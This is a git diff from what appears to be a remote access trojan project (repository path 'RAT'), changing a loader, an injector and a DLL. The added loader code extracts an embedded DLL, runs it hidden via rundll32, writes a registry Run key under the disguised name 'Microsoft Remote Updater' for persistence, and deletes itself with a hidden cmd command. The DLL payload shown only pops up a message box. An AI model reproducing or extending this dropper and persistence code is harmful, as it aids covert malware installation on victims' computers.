diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj
index 2be397b..18ce4a4 100644
Binary files a/Debug/FunDLL.iobj and b/Debug/FunDLL.iobj differ
diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb
index e9521e9..2099e96 100644
Binary files a/Debug/FunDLL.ipdb and b/Debug/FunDLL.ipdb differ
diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb
index 5cc9330..5df122a 100644
Binary files a/Debug/FunDLL.pdb and b/Debug/FunDLL.pdb differ
diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb
index 3afe78f..c69c382 100644
Binary files a/Debug/Injector.pdb and b/Debug/Injector.pdb differ
diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb
index 7442067..693e8ed 100644
Binary files a/Debug/Loader.pdb and b/Debug/Loader.pdb differ
diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log
index a7d3ee7..5e221a8 100644
--- a/Dll/Debug/Dll.log
+++ b/Dll/Debug/Dll.log
@@ -1,5 +1,6 @@
 C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
 C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
+ fundll.cpp
 Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
 Generating code
 All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog
index b1f5512..4682923 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog
index cecb9a2..b4bb458 100644
Binary files a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog and b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog differ
diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb
index c1fb6af..6039950 100644
Binary files a/Dll/Debug/vc141.pdb and b/Dll/Debug/vc141.pdb differ
diff --git a/Dll/Dll.vcxproj b/Dll/Dll.vcxproj
index 8574aaf..439f48f 100644
--- a/Dll/Dll.vcxproj
+++ b/Dll/Dll.vcxproj
@@ -31,7 +31,7 @@
 DynamicLibrary
 true
 v141_xp
- Unicode
+ MultiByte
 true
diff --git a/Dll/fundll.cpp b/Dll/fundll.cpp
index 5882e98..2eab02b 100644
--- a/Dll/fundll.cpp
+++ b/Dll/fundll.cpp
@@ -6,14 +6,18 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
 break;
 case DLL_PROCESS_DETACH:
-
+ break;
 default:
-
+ break;
 }
+ return 1;
 }
 extern "C" __declspec(dllexport) int FunEntry() {
- return MessageBoxA(0, "Hello from C2", 0, 0);
+ char exe[MAX_PATH + 1];
+ GetModuleFileNameA(0, exe, sizeof(exe));
+ MessageBoxA(0, exe, "I am inside: ", 0);
+ return 0;
 }
\ No newline at end of file
diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk
index b2ac90c..5de5b6b 100644
Binary files a/Injector/Debug/Injector.ilk and b/Injector/Debug/Injector.ilk differ
diff --git a/Injector/Debug/Injector.log b/Injector/Debug/Injector.log
index 198e2b0..d66fb90 100644
--- a/Injector/Debug/Injector.log
+++ b/Injector/Debug/Injector.log
@@ -1,2 +1,2 @@
- LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link
+ injector.cpp
 Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
diff --git a/Injector/Debug/Injector.tlog/link.read.1.tlog b/Injector/Debug/Injector.tlog/link.read.1.tlog
index 4a6fd2d..4073d96 100644
Binary files a/Injector/Debug/Injector.tlog/link.read.1.tlog and b/Injector/Debug/Injector.tlog/link.read.1.tlog differ
diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb
index a02dcd8..71e54e2 100644
Binary files a/Injector/Debug/vc143.idb and b/Injector/Debug/vc143.idb differ
diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb
index bc03652..c2807b3 100644
Binary files a/Injector/Debug/vc143.pdb and b/Injector/Debug/vc143.pdb differ
diff --git a/Loader/Debug/Loader.log b/Loader/Debug/Loader.log
index edac3ef..d7e0545 100644
--- a/Loader/Debug/Loader.log
+++ b/Loader/Debug/Loader.log
@@ -1,2 +1,6 @@
 C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
+cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
+ loader.cpp
+ tools.cpp
+ Generating Code...
 Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
diff --git a/Loader/Debug/Loader.tlog/link.command.1.tlog b/Loader/Debug/Loader.tlog/link.command.1.tlog
index 1aeeb1c..b536724 100644
Binary files a/Loader/Debug/Loader.tlog/link.command.1.tlog and b/Loader/Debug/Loader.tlog/link.command.1.tlog differ
diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog
index 62b1f8e..f03f114 100644
Binary files a/Loader/Debug/Loader.tlog/link.read.1.tlog and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ
diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb
index 8f184aa..02fe3bb 100644
Binary files a/Loader/Debug/vc141.pdb and b/Loader/Debug/vc141.pdb differ
diff --git a/Loader/Loader.vcxproj b/Loader/Loader.vcxproj
index 0e0d345..6c22cec 100644
--- a/Loader/Loader.vcxproj
+++ b/Loader/Loader.vcxproj
@@ -96,7 +96,7 @@
 Windows
 true
- kernel32.lib;user32.lib
+ kernel32.lib;user32.lib;advapi32.lib
diff --git a/Loader/loader.cpp b/Loader/loader.cpp
index 35af249..ea2b25e 100644
--- a/Loader/loader.cpp
+++ b/Loader/loader.cpp
@@ -4,7 +4,7 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
 PBYTE module_base = PBYTE(Tools::GetImageBase());
 if (module_base != ERROR) {
- // extract payload from section move to %appdata% with random name
+ // extract payload from section
 DWORD module_size = NULL;
 PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
@@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
 if (new_file != INVALID_HANDLE_VALUE) {
 WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
 }
+ CloseHandle(new_file);
+ }
+ LocalFree(dll_memory);
+
+ // runs the dll after extraction
+ WCHAR win_path[MAX_PATH];
+ if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) {
+ if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) {
+ lstrcatW(win_path, appdata_path);
+ lstrcatW(win_path, L",");
+ lstrcatW(win_path, L"FunEntry");
+
+ STARTUPINFO startup_inf{ 0 };
+ PROCESS_INFORMATION process_information{ 0 };
+ startup_inf.cb = sizeof(startup_inf);
+
+ BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information);
+
+ if (b) {
+ HKEY reg_key;
+ LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, ®_key);
+ if (bb == ERROR_SUCCESS) {
+ RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path));
+ RegCloseKey(reg_key);
+ }
+ //WaitForSingleObject(process_information.hProcess, INFINITE);
+ //CloseHandle(process_information.hProcess);
+ }
+ }
+ }
+ }
+
+ // delete loader
+ WCHAR del_cmd[MAX_PATH];
+ if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) {
+ if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) {
+ WCHAR app_name[MAX_PATH];
+ GetModuleFileNameW(0, app_name, MAX_PATH);
+ lstrcatW(del_cmd, L"/c del \"");
+ lstrcatW(del_cmd, app_name);
+ lstrcatW(del_cmd, L"\"");
+
+ STARTUPINFO sii{ 0 };
+ PROCESS_INFORMATION pii{ 0 };
+ sii.cb = sizeof(sii);
+
+ CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii);
+ return 0;
 }
 }
 }
\ No newline at end of file